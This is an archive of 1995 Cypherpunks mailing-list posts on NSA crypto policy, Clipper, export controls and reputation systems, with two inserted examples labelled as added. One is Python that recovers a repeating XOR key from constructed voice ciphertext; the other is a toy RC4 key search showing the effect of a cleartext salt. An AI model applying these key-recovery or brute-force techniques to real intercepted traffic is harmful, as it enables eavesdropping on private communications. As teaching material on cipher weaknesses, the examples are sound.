> >  than obtaining the information by other means -- wiretaps and so on.

> "Vladimir Z. Nuri" <vznuri@netcom.com> writes:
> but for some reason, the NSA keeps humming along...? perhaps 
> confirming the rule that bureaucracies, like bores at parties,
> persist long after they are relevant?

Evidently they have plenty of other sources to deal with... their SIGINT
charter is to read traffic, not necessarily to decrypt traffic.  It does
seem excessive, though, and it will seem even more excessive once more
traffic is encrypted with strong systems and plaintext begins to disappear
from the airwaves and wires.  It bothers me that the gov't appears to
be redefining the role of the intelligence community to be economic spying
rather than the military spying that was (I think) justified during the
Cold War.  Rather than finding ways to justify and maintain current budgets
and bureaucracies, why not just cough up the peace dividend?

> >In the future there will be more radio used for ordinary communications.
> >Americans are unwilling to pay for secure telephones, but that's not the
> >case in Europe.

> I object to this highly. the NSA has very little credible understanding
> of market forces, IMHO. they are a government agency. they do not
...
> as for the market viability of cryptographic phones, I think this
> is duplicity ranging on utter lying that "the US public is not 
> willing to pay for secure phones". this is precisely the baseless

I misstated his point to some extent here.  He was contrasting current
buying practices in the U.S. and in Europe, not predicting the future (i.e.
not exactly what I said above).  In particular, he mentioned GSM in Europe
and its success... of course, that doesn't count as strong encryption with
the keys evidently being no better than 40 bits worth, but it's a lot
better than calling in the clear from your cellular phone.  He indicated
that Europe has embraced GSM and the US has not (yet) embraced anything
equivalent (about which more below).

>                                           Clipper, the closest the
> agency has come to creeping out of the darkness of their coffin,
> was a total fiasco.

Clipper wasn't a fiasco from the gov't's point of view if you look at what
it prevented rather than what it achieved.  By now the DES-based AT&T
encryption box might be the US standard if the Gov't hadn't intervened by
"incentivizing" them around the time of the Clipper roll-out.  It was
ready to go and was already in production when Clipper got rushed up.  As
it is there is now no standard and most traffic is still in clear.  If
this doesn't reflect a credible and <practical> understanding of how the
market works, what would?  Of course this one can't completely be laid at
NSA's door, but it's convenient to think of them as the fount of US crypto
policy decisions.

>              you see, there is far more to be gained from widespread
> encryption than is to be lost from it.

Agreed.

	Jim Gillogly
	Trewesday, 13 Halimath S.R. 1995, 01:26




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 3 Sep 95 18:52:47 PDT
To: cypherpunks@toad.com
Subject: maximizing cryptographic return
Message-ID: <199509040149.SAA01359@netcom10.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


the question of the cost-effectiveness of  phone encryption was raised by 
my other message. I would like to question how cheaply good encryption
could be done on phones, with a poor quality microprocessor. most on
this list are aware of the idea that good encryption is often used
to send a low-bandwidth session key, which is then used to encrypt
that session using a less sophisticated but less computationally-demanding
algorithm. hence you seem to have good security at a computational
price that is less than encrypting everything with the secure protocol.

I was wondering how secure the following algorithm would be for phone
calls: suppose that at the beginning of each session, the random
key is traded using RSA or some other very secure approach. the
key is a *random bit width*, say 100-6000 bits. now, my question is,
I wonder if some very cheap algorithms, in terms of computation time,
could be used for the "on the fly" encryption of the voice using those
bit. would XOR with the pad be totally out of line? 

the situation is such that trivial algorithms such as XOR with  *unlimited
cyphertext* can be broken quite trivially. but it seems to me this
dogma that "XOR is WEAK" is based on the premise that you have a huge
amount of cyphertext to play with. take away this premise, that you
have a session key that is guaranteed to really give you very little
cyphertext, do these supposedly "weak" algorithms then become pretty
secure?

what I am getting at is that it seems there is this frequent assumption
that "good cryptography for on-the-fly encryption means you need huge
computational bandwidth". I wonder how true this really is. can you have
a situation where you spend a lot of time computationally negotiating
the *random one time pad*, but then have a fairly weak algorithm doing
the on-the-fly encryption with the random pad?

IMHO this would be the holy grail for phone hardware. as I wrote, you
are already going to have something approximating the power of a low-
bandwidth microprocessor in a phone. now imagine it took a long time
to send the key at the beginning, but that once traded it was no 
big deal-- real time communication using even "weak" algorithms.

what I am suggesting here is that we can get encryption for almost *no
additional cost* over existing phone hardware. and I am suggesting that
the main hurdles to encryption are political, not technical.

again, I wonder if "weak" encryption schemes are really that weak if they
are only used on short cyphertexts and if you have a good, secure
OTP (one time pad). I think it may be a delusion that you must have
a huge amount of computational bandwidth or have to encrypt every bit
using state-of-the-art, computationally-demanding algorithms to have 
extremely secure on-the-fly communications.

p.s. can someone give a brief summary of the Nautilus and PGP session
key / code frameworks?

p.p.s. 

a few footnotes in regard to the previous article. widespread,
seamless phone encryption is the NSA's absolute worst nightmare. everything
they are doing to prevent cryptography can be thought of as trying to
avoid this particular reality configuration. pay special attention how
they approach the issue and it will tell you what they fear the most,
and what they are trying to do to prevent it. 

also, Bob Morris said in his talk, acc. to Gillogly, that Europeans
*were* willing to pay for encryption in their phones, but those in the
US weren't. please expand on that little nugget!! how did you come
to that conclusion? why are americans fundamentally different than
europeans in regard to the value of encryption? if humans want the
same thing in most markets (as the situation of international product
marketing generally seems to suggest) does it make you think
that something besides the desirability of crypto is at stake here
in the localities, such as *politics*?

--Vlad Nuri
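
Added example, not part of the original message: the scheme asked about above, with the exchanged session key reused as the XOR pad for the whole call, evaluated on constructed data. It assumes unsigned 8-bit samples with silence at 0x80, a constructed 16-byte key and a constructed two-second "call"; once the call outlasts the key the pad repeats, so it is no longer a one-time pad.

```python
from collections import Counter

SILENCE = 0x80  # assumption: unsigned 8-bit PCM, where silence sits at mid-scale

# Constructed 128-bit session key (16 distinct bytes), standing in for the
# key that would have been exchanged under RSA at call setup.
SESSION_KEY = bytes.fromhex("3a91c45e07b268f12d8c49e3760bd5a0")


def constructed_voice(n: int) -> bytes:
    """Constructed stand-in for a call: 800-sample blocks, one in four carrying
    a 'talk' burst, the rest silence. Real speech is likewise mostly pauses."""
    out = bytearray()
    for i in range(n):
        talking = (i // 800) % 4 == 3
        out.append(SILENCE + (i * 37) % 41 - 20 if talking else SILENCE)
    return bytes(out)


def xor_stream(data: bytes, key: bytes) -> bytes:
    """The proposed cipher: XOR each sample with the key, repeating the key."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def coincidence(ct: bytes, shift: int) -> float:
    """Fraction of positions where ct[i] == ct[i + shift].
    When shift is a multiple of the key length the key cancels out, so this
    measures plaintext repetition directly."""
    pairs = len(ct) - shift
    return sum(ct[i] == ct[i + shift] for i in range(pairs)) / pairs


def estimate_key_length(ct: bytes, max_len: int = 64) -> int:
    """Smallest shift whose coincidence rate is at least half the best seen."""
    rates = {s: coincidence(ct, s) for s in range(1, max_len + 1)}
    best = max(rates.values())
    return min(s for s, r in rates.items() if r >= best / 2)


def recover_key(ct: bytes, key_len: int) -> bytes:
    """Every key_len-th byte was XORed with the same key byte, so the
    commonest value in each such column is (silence XOR key byte)."""
    return bytes(
        Counter(ct[j::key_len]).most_common(1)[0][0] ^ SILENCE
        for j in range(key_len)
    )


def demo():
    voice = constructed_voice(16000)  # two seconds at 8 kHz
    ct = xor_stream(voice, SESSION_KEY)
    key_len = estimate_key_length(ct)
    key = recover_key(ct, key_len)
    return key_len, key, xor_stream(ct, key) == voice


if __name__ == "__main__":
    key_len, key, ok = demo()
    print(f"estimated key length: {key_len} bytes")
    print(f"key recovered from ciphertext alone: {key == SESSION_KEY}")
    print(f"call decrypted: {ok}")
```

A longer key only moves the point at which the pad starts repeating; what keeps the per-sample cost low without this failure is a keystream that does not repeat over the length of the call.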




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 3 Sep 95 19:15:32 PDT
To: jim@acm.org
Subject: Re: NSA says Joe Sixpack won't buy crypto
In-Reply-To: <199509040139.SAA26859@mycroft.rand.org>
Message-ID: <199509040212.TAA03591@netcom10.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



JG:
>Rather than finding ways to justify and maintain current budgets     
>and bureaucracies, why not just cough up the peace dividend?  

taking money from a bureaucracy is like the exact opposite of taking
candy from a baby. but hell, maybe you could get a job as a spook
in their dark tunnels and "show them the light" so to speak. <g>

>I misstated his point to some extent here.  

oh right, any perceived boneheadness on the part of a premiere spook
is surely in the eye of the beholder <g>

>  He indicated
>that Europe has embraced GSM and the US has not (yet) embraced anything
>equivalent (about which more below).

well, thanks for clearing up the assertion but I stand by my rant.
(and BTW, thank you for the wonderful opportunity, one must prize every
opportunity to get one's blood boiling to know one is alive). the
US may very well not have "embraced" any encryption standard because
the NSA is trying to THROW A @#$%^&* WRENCH INTO ANY STANDARD THAT
IS DEVELOPED. that is EXACTLY WHAT CLIPPER WAS AN ATTEMPT TO DO.

y'know that we MAY HAVE WIDESPREAD ENCRYPTION BY NOW if the NSA had
not continually interfered with what is normally a NATURAL PROCESS
of standards creation in the technological community. Clipper is
a black, black mark not only because of what it tried to *introduce*,
but also of what it tried to *replace*.

again, the fact that we do not have widespread encryption in the U.S.
acc. to the NSA reminds me of the anecdote of the murderer going before
the court and stating that he deserved leniency because he was an
orphan. THE NSA HAS TRIED TO MURDER CRYPTO IN THE U.S. and then say,
"gosh!! there's no crypto!! no one has it!! therefore, no one wants it!!
why is everyone so angry when we tried to keep it from everyone when
nobody wants it"? @#$%^&*!!!

again, I suggest that the lack of crypto in the US is due to a 
*political* situation, and nothing else. the NSA of course would like
to deny that, and justify the *political* situation based on something else
(such as that people don't really want encryption or that it is not really
in the nation's best interests)
 
>Clipper wasn't a fiasco from the gov't's point of view if you look at what
>it prevented rather than what it achieved.  By now the DES-based AT&T
>encryption box might be the US standard if the Gov't hadn't intervened by
>"incentivizing" them around the time of the Clipper roll-out. 

exactly. THE MARKET COULD HAVE BEEN MATURING LONG AGO INSTEAD OF 
THROWN INTO CONFUSION.  we could have been on the path to improving 
encryption capability. and Clipper is only the product that we *saw*
in front of the world. did anything in the Clipper announcement talk
about the government collusion with AT&T? it is patently obvious that
the NSA has long worked behind the scenes to try to sabotage crypto,
and that Clipper was only the most desperate instance that we *heard*
about.

of course, when there is widespread crypto the NSA will probably try
to justify its existence based on the widespread crypto in the world,
and take credit for its introduction. "why, after all, Clipper was
a major step in introducing good encryption to the masses".  @#$%^&*

> It was
>ready to go and was already in production when Clipper got rushed up.  As
>it is there is now no standard and most traffic is still in clear.

indeed!! true progress!! the government has accomplished its mission
of sabotaging privacy!! so Clipper is a tremendous success in sowing
fear of the NSA into every American!! in throwing the standards process
into total confusion!!

JG, let me ask you a question. imagine there was some foreign government
agency, say of a totalitarian government, that wanted to prevent the
"spread of cyberspace" around the world. don't you think they could
be quite effective in  killing the Internet as it was growing? it would
be quite trivial to insert agent-provocateurs into all the open
standards-making Internet conventions. where would we be now if this
happened?

cryptography is very intrinsic to cyberspace, and it would be quite
ubiquitous now if it weren't for the reprehensible covert and overt
NSA wrench-throwing acts. the NSA is sabotaging the natural growth of
cyberspace, unequivocally. I hope that every person in the NSA who
reads about Netscape or uses it, the Web, or the Internet,  hangs his/her
head in shame, that he worked in an agency that helped work *against* the 
reality that created these wonderful embodiments of freedom in 
communication.

>>              you see, there is far more to be gained from widespread
>> encryption than is to be lost from it.
>
>Agreed.

actually, to tell you the truth I don't consider that a given. it is
very well possible that a huge advantage shifts to the terrorists of
the world. it very well may be!! but is anyone actually trying to
unbiasedly *answer* this question with honest research? of course
not. the NSA, the FBI, the whole law enforcement community is in
total CYA mode. we have Freeh actually utter at a press conference,
"would you feel the same about strong encryption if your daughter
was kidnapped by a pedophile?" or whatever his little @#$%^^&*
phrase was....anybody remember that slimy epithet of his?

for god's sake, could someone in the government do a study of 
what would *actually happen* if there was widespread encryption,
instead of letting the NSA's apparent default idea of "apocalypse now!!!" 
rule the whole debate?? the NSA is always talking about "the right
to communication balanced with the needs of law enforcement", but have
they ever determined what in fact the costs are to society at large?
beyond simply ASSUMING that if a policeman complains that he can't
tap a phone line, that the world is really going to end tomorrow?!?!

has it ever occurred to law enforcement agencies that widespread
encryption may actually make their lives *easier*?? I could see a
situation where this is possible. the police routinely say, "sorry
ma'am we can't do anything because our hands are tied". if the police
and our government were prevented from any intervention into any
area involving cyberspace, perhaps both society and the police would
breathe a lot easier!!

--Vlad Nuri




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Sun, 3 Sep 95 19:42:08 PDT
To: cypherpunks@toad.com
Subject: Re: Crypto '95: Robert Morris
Message-ID: <9509040238.AA04342@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> So Robert Morris worked for NSA.
> Does that mean that the infamous 1988 Internet Worm
> was part of a NSA-sponsored intelligence-gathering mission?
> 
No, that was his kid!  Imagine his chagrin!

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Sun, 3 Sep 95 17:35:43 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Joel's RSA-t's
In-Reply-To: <m0snW0o-0001puC@wittsend.com>
Message-ID: <9509040035.AA28573@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Mike writes [re: Perl-RSA T-shirts]:
> 	I just have one problem though...  If these things are classified
> as a "munition" aka a "weapon" by da fed's how does that affect us down
> here in good old Georgia where our legislature has passed a law making
> it a crime to be in possession of a weapon anywhere within a hundred yards
> or so of school property.  

Strong crypto is considered to be a munition *for purposes of U.S. export
controls*. With respect to possession within the U.S., there aren't any
laws stopping you from waving strong cryptography around wherever you like
(at least, not yet).

-Futplex





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Sun, 3 Sep 95 18:19:37 PDT
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: NSA says Joe Sixpack won't buy crypto
In-Reply-To: <199509040052.RAA25910@netcom10.netcom.com>
Message-ID: <Pine.SUN.3.91.950903211644.15206B-100000@access2.digex.net>
MIME-Version: 1.0
Content-Type: text/plain



On Sun, 3 Sep 1995, Vladimir Z. Nuri wrote:

> was a total fiasco. the self-destructing director of NSA whats-his-name
> who was running for that FBI position or whatever is another example of how
> the inbred spook society has difficulty dealing with anything outside
> their artificial reality.

Give this man a prize.


---
00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
*New Key Information*    -    Finger for key revocation and latest key update.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Thu, 7 Sep 95 08:56:12 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: GAK
In-Reply-To: <ac6cea0f00021004158f@[205.199.118.202]>
Message-ID: <Pine.D-G.3.91.950903212120.8430B-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 1 Sep 1995, Timothy C. May wrote:

> At 10:56 PM 9/1/95, Buford Terrell wrote:
> 
> >If you've ever watched Not_at_all_Funny Home Videos or any of the
> >American Urinal school of tabloid television, you soon start feeling
> >that the real threat to privacy is not the guvmint, but all of
> >the yoyos with their little cam corders running around pointing them
> >at people.
> >
> >Security cameras in ATMS and at airline ticket counters do more
> >to threaten your privacy than do FIBBIE wiretaps, and PGP won't
> >protect you from them. (and usually neither will the courts).
> 
> I absolutely agree with this, though this doesn't mean I'll stop worrying
> about the government's plans for key escrow (GAK), about limits on key
> lengths, or about other efforts to thwart strong security.

I, of course, know of the "dislike" of GAK here.  I am curious to know, 
however, if the "dislike" is because government would have access under 
any circumstances or if the primary worry is that government will cheat 
and get access when most would agree that they shouldn't (either by the 
judge "cheating" or a TLA stealing it).

In other words ... if it took agreement by a review board composed of 
non-LEA members of this list, would the escrow be acceptable??

EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Thu, 7 Sep 95 08:55:48 PDT
To: cypherpunks@toad.com
Subject: Zimmerman's statute
In-Reply-To: <jw5RwkkAs2nN084yn@ouray.cudenver.edu>
Message-ID: <Pine.D-G.3.91.950903212711.8430C-100000-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 1 Sep 1995, Alan Westrope wrote:

> On Fri, 01 Sep 1995, Michael Froomkin <mfroomki@umiami.ir.miami.edu> wrote:
> 
> > I think he would have to be charged first.  Have I missed something?
> > PS when does the statute of limitations run out?
> 
> June '96.  Zimmermann and Dubois appeared on a local talk radio show
> recently; a friend happened to catch the program, taped it, and played
> excerpts at a Cypherpunks meeting.  This date was mentioned by Phil Dubois.

I wouldn't be so sure.  There are lots of "creative" ways to, in effect, 
extend the statute.  My personal sense is that DOJ eventually wants to 
get this over with, so presumably would not attempt to be so "creative."

The "usual" statute of limitations for federal crimes is 5 years, but 
conspiracy, RICO, bank fraud, tax offenses, and no doubt others that 
don't occur to me right now, muddy the 5 year statute.  Bank fraud, for 
example, has a 10 year statute.

EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lyalc@ozemail.com.au (lyal collins)
Date: Sun, 3 Sep 95 04:45:46 PDT
To: cypherpunks@toad.com
Subject: A bold ssl idea ?
Message-ID: <199509031145.VAA12843@oznet02.ozemail.com.au>
MIME-Version: 1.0
Content-Type: text/plain


Having watched the recent discussions of the SSL bruting, it occurred to
me that a variation could also be useful.
I understand that setting up RC4 keys is slower than testing for the correct
key (I may have misunderstood this bit).
As a company using SSL can have all its SSL traffic sniffed, from multiple
people accessing, a log can easily be built of message/keys.
Is it considered practical to modify the brutessl code to have multiple
message data, and test each against a key from allocated key space ?
If so, this may mean that perhaps 3 messages can be tested against a single
key in the time two single keys could be tested against one message.
As an attack scenario, this is a hell of a lot more "efficient" than current
trials have been. I realise this could also be considered a bit of target
for the main purpose of demonstrating weaknesses, and improving techniques.
My thoughts, anyway - I hope they make sense.
lyal





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sun, 3 Sep 95 21:52:26 PDT
To: cypherpunks@toad.com
Subject: Re:  pseudonyms & list health
Message-ID: <199509040451.VAA23173@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: "Vladimir Z. Nuri" <vznuri@netcom.com>
> hence, what I am suggesting is that one
> of the "stable attractors"  that TM is always talking about
> may be a reality in which people pool most of their accomplishments
> under a single nym. furthermore, they will wish to avoid conflict
> with other nyms in respect to attribution. 
> isn't this, functionally, the equivalent of the supposed
> anti-cypherpunk "true names"?

An interesting point.  I have long wished that there would be a form of
"credential certificates" which people could give as special signatures
on other people's public keys.  Then using Chaumian credential technology
it would be possible to anonymously transfer these credentials from one
pseudonym to another.

This is not a perfect solution, of course.  Much reputation is informal
and simply resides in the opinions held in people's minds.  But perhaps
if a more structured solution like this became widespread it would help
to prevent the "concentration of reputation" which Vlad describes.

Along with the usual flames, I occasionally get messages saying nice
things about postings I have made, and I sometimes save these in a file
called "praise".  Here are some excerpts:

> Again, thanks for posting some useful information that
> actually has *direct relevance to crypto*.

> I really enjoyed reading this.  It was well written and comprehensive. 
> Thanks for sharing it. 

> Nice post!

I certainly appreciate these kinds of comments, but it would be even
more useful if such messages were expressed as the kinds of
certificates I am describing.  I wonder whether people would be willing
to use a program which would let them issue such "reputation
signatures" of various kinds, and display the signatures which were
present on keys.

Discussion of such schemes has often bogged down in considering the
various categories or types of credentials people might want to give.
This is somewhat analogous to the "rate-the-net" schemes we have talked
about where a similar issue arises if we try to mark pages with a whole
range of characteristics so people can judge whether they should let
their kids read them.  Perhaps the solution needs to be found in
simplicity.  SurfWatch (as I understand it) gives a simple "thumbs down"
to selected web pages.  Maybe a simple "endorsement" would be useful as a
reputation credential without trying to identify exactly what it is about
the person you are endorsing.

I could see such a system initially being piggybacked on PGP keys (the
signatures would not be understandable by PGP though), although for
Chaumian credential transfers the keys have to be specially structured
and that would require a new approach.

Who would be willing and/or interested enough to use such a system if it
existed?

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sun, 3 Sep 95 19:03:26 PDT
To: Jim Gillogly <jim@acm.org>
Subject: Re: NSA says Joe Sixpack won't buy crypto
In-Reply-To: <199509040139.SAA26859@mycroft.rand.org>
Message-ID: <Pine.SV4.3.91.950903215715.6268B-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


"Just cough up the peace dividend".

There is no peace dividend. There is a massive eco-spill of government 
debt;  quite possibly larger than the GNP capacity of the American 
economy to repay anytime in the next century.

The debt will be bankrupted, in some stealthy manner, hidden by masses of 
smoke and mirrors. Nothing new here - it's  about the only thing that 
works. For the most recent examples, read up on FDR's confiscation of 
gold in (?) 1933.  Or read the details of the currency changeover 
effected by the occupation authorities in Germany (1947 or 1948).

Alan Horowitz
alanh@infi.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 3 Sep 95 21:56:43 PDT
To: cypherpunks@toad.com
Subject: Clinton's Black Helicopters Over My House!
Message-ID: <ac6fd3aa0202100430a8@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


ObConspiracy content: high.

They are coming to take me away, take me away!

Clinton's black helicopters are swooping low over my house.

What should I do?

Yes, this has nothing to do with coding in C, or even coding in Java, but
it's too good a story not to share with you.

My hilltop house, in the Santa Cruz mountains, lies directly between
Monterey and San Jose. His Excellency is landing tonight in
Monterey--probably has just done so, judging by the sudden increase in air
traffic--to dedicate tomorrow a "defense conversion" of the former Fort Ord
to "Cal State Monterey Bay," a new state college. (In California there are
three tiers of colleges: the 9 campuses of the University of California
system (Berkeley, UCLA, UCSC, UCSB, UCSD, etc.), the twenty-some "Cal
State" schools, and some ungodly number of Community Colleges.)

Anyway, lots of choppers flying directly over my house, at fairly low altitude.

Maybe I could spell out a Cypherpunks message in white stones in my
driveway, or maybe just a rose? He'll be choppering from Monterey to
Alameda tomorrow, after lunch, so I need to think of something to prepare
for him.

I'm tempted to try to take a photo with my telescope, but the choppers
flying with him might think I had a Redeye or Stinger or something from the
weapon shops of Isher, and send me back at least a visit by the
Praetorians, so I'll avoid "looking dangerous" in my back yard as the
choppers pass overhead.

(I find it hard to believe what the scribblers are saying, that this is the
first visit by a sitting President to Monterey in 100 years. What with
Carmel and Big Sur nearby, kind of hard to believe, eh?)

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 3 Sep 95 22:07:51 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Wearing RSA shirt to school
Message-ID: <ac6fd726030210040224@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


Grumpiness warning: I have held my tongue the past few months as all of
these "this t-shirt has been declared a munition!!!" messages went out, but
I can hold my tongue no longer.


At 4:43 AM 9/4/95, Futplex wrote:
>I wrote:
>> With respect to possession within the U.S., there aren't any
>> laws stopping you from waving strong cryptography around wherever you like
>> (at least, not yet).
>
>----
>...and in private email, Jim Ray pointed out that showing the shirt to a
>foreign national might technically violate ITAR...

Nope, no more so than letting a foreign national read Schneier's book is a
violation of the ITAR. If you dispute this, ask whether Schneier's book is
banned from export (the book, not the optional diskette). It isn't. Nor are
other cryptography _books_ banned from export.

I'm not minimizing the issue of export of machine-readable code, as in
diskettes. But to claim that a blurry, printed on cotton "barcode" is even
remotely in the same class as exporting a workable set of cryptographic
system routines, or that letting a furriner merely "gaze upon" this blurry
barcode, is a violation of the ITARs is laughable.


>Yeah, I suppose I overstated it a bit. It appears that if the ITAR do cover
>the shirt (unclear at present, AFAIK -- any news on the CJR, Raph ?), then
>flashing it at a furriner could constitute a violation. Thanks for the
>correction.

No. No more so than "flashing" a copy of a crypto book would constitute a
violation.

>
>The gist of my previous message remains: No local or state authority in the
>U.S. (of which I'm aware) classifies strong cryptography as a munition,
>weapon, etc. I haven't heard of any restrictions on transporting crypto
>across state lines, either. Unless the Feds start cracking down on high
>schools, or the Perl-RSA shirt somehow violates some school dress code, (gang
>colors ? ;)  the original questioner need not fret about his son wearing the
>shirt to school.

It was this series of posts about whether wearing the "munitions t-shirt"
near schools was a crime or not that made me think the silly season had
arrived. If the t-shirt is a munition, and books are munitions, then
libraries must be real "ammunition dumps," ready to explode at any minute.
News at 11.

Let's get real.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Sun, 3 Sep 95 15:20:24 PDT
To: cypherpunks@toad.com
Subject: Re: A bold ssl idea ?
In-Reply-To: <199509031145.VAA12843@oznet02.ozemail.com.au>
Message-ID: <42d9lh$mjf@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199509031145.VAA12843@oznet02.ozemail.com.au>, lyalc@ozemail.com.au (lyal collins) writes:
> Having watched the recent discussions of the SSL bruting, it occurred to
> me that a variation could also be useful.
> I understand that setting up RC4 keys is slower than testing for the correct
> key (I may have misunderstood this bit).
> As a company using SSL can have all its SSL traffic sniffed, from multiple
> people accessing, a log can easily be built of message/keys.
> Is it considered practical to modify the brutessl code to have multiple
> message data, and test each against a key from allocated key space ?
> If so, this may mean that perhaps 3 messages can be tested against a single
> key in the time two single keys could be tested against one message.
> As an attack scenario, this is a hell of a lot more "efficient" than current
> trials have been. I realise this could also be considered a bit of target
> for the main purpose of demonstrating weaknesses, and improving techniques.

  This technique has been discussed before.  It will not work because
the 40-bit export version of SSL actually uses 128 bit keys, with 88 of
the bits transferred in the clear.  The extra 88-bits act as a "salt" to
the key.  This defeats attempts to do a single key space search for 
multiple messages.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.
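
The effect of the cleartext salt described in the reply above, as an added
example that is not part of the original message or of any SSL code. It is a
toy model: the secret is cut to 10 bits so the search finishes at once, the
key layout (secret then salt) and the sample plaintext are assumptions, and
the real protocol's key derivation is not modelled.

```python
"""Toy model of a cleartext salt on a short secret key (constructed example)."""

SECRET_BITS = 10                    # toy stand-in for the 40 secret bits
KNOWN = b"GET / HTTP/1.0\r\n"       # constructed known-plaintext prefix


def rc4_keystream(key: bytes, n: int) -> bytes:
    """Standard RC4: key setup over 256 entries, then n keystream bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):                        # key setup, the costly step
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def session_key(secret: int, salt: bytes) -> bytes:
    """Assumed layout: secret bits first, then the salt that travels in the clear."""
    return secret.to_bytes(2, "big") + salt


def capture(secret: int, salt: bytes) -> dict:
    """What an eavesdropper holds for one session: the clear salt and the ciphertext."""
    ks = rc4_keystream(session_key(secret, salt), len(KNOWN))
    return {"salt": salt, "ct": bytes(a ^ b for a, b in zip(KNOWN, ks))}


def search(captures: list) -> tuple:
    """Exhaust the secret space for every capture; return (secrets found, key setups).

    One key setup can be checked against every capture that shares its salt,
    so the cost is (number of distinct salts) * 2**SECRET_BITS.
    """
    by_salt = {}
    for idx, cap in enumerate(captures):
        by_salt.setdefault(cap["salt"], []).append((idx, cap["ct"]))
    found, setups = {}, 0
    for salt, group in by_salt.items():
        for secret in range(1 << SECRET_BITS):
            ks = rc4_keystream(session_key(secret, salt), len(KNOWN))
            setups += 1
            for idx, ct in group:
                if bytes(a ^ b for a, b in zip(ct, ks)) == KNOWN:
                    found[idx] = secret
    return found, setups


SECRETS = [0x155, 0x2A3, 0x01F]     # constructed per-session secrets
NO_SALT = [capture(s, b"") for s in SECRETS]
# Three sessions, each with its own constructed 88-bit (11-byte) salt.
SALTED = [capture(s, bytes([n]) * 11) for n, s in enumerate(SECRETS, 1)]

if __name__ == "__main__":
    for name, caps in (("no salt", NO_SALT), ("88-bit salt", SALTED)):
        found, setups = search(caps)
        print(f"{name:12s} sessions={len(found)} key setups={setups}")
```

Without a salt the three sessions share one pass over the key space; with
per-session salts each session needs its own pass, so the work grows with
the number of sessions.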




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 3 Sep 95 22:58:32 PDT
To: cypherpunks@toad.com
Subject: Reputations and Reading Preferences
Message-ID: <ac6fdc45050210043624@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



(This post has a second part, "Using Web Sites to Get Distributed Ratings,"
which you might want to read even if the first part looks uninteresting.)


Hal has some interesting comments, as usual, about how positive feedback
about authors can be integrated into mail readers and news readers. (Or at
least I took Hal's post as a jumping off point to think about these
issues--again.)

I've given this some thought recently, but have reached no firm
conclusions, except: it's probably not needed by most of us.

